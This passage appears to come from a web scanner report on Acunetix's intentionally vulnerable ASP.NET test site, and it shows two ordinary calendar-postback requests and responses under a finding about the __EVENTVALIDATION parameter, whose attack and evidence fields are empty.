Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8284&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA5b2aj9oIZGRkvrO%2BHFqU2CWkVz2z3B3a8euhut0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpoLm7AQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqegpNL0bFI3lz8XFS9gL7XkK0%2Bn
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:10 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA5b2aj9oIZGRkvrO+HFqU2CWkVz2z3B3a8euhut0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpoLm7AQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqegpNL0bFI3lz8XFS9gL7XkK0+n" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:White" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8557&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAq%2FggZtsIZGRkG3u3frM1BRDAFS1SEpH1JJQgMD4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKPprfLCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IM%2BHjLvap8R5ltZS9pFe6r8Cvc9Ow%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:41 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAAq/ggZtsIZGRkG3u3frM1BRDAFS1SEpH1JJQgMD4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKPprfLCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IM+HjLvap8R5ltZS9pFe6r8Cvc9Ow=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:White" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how 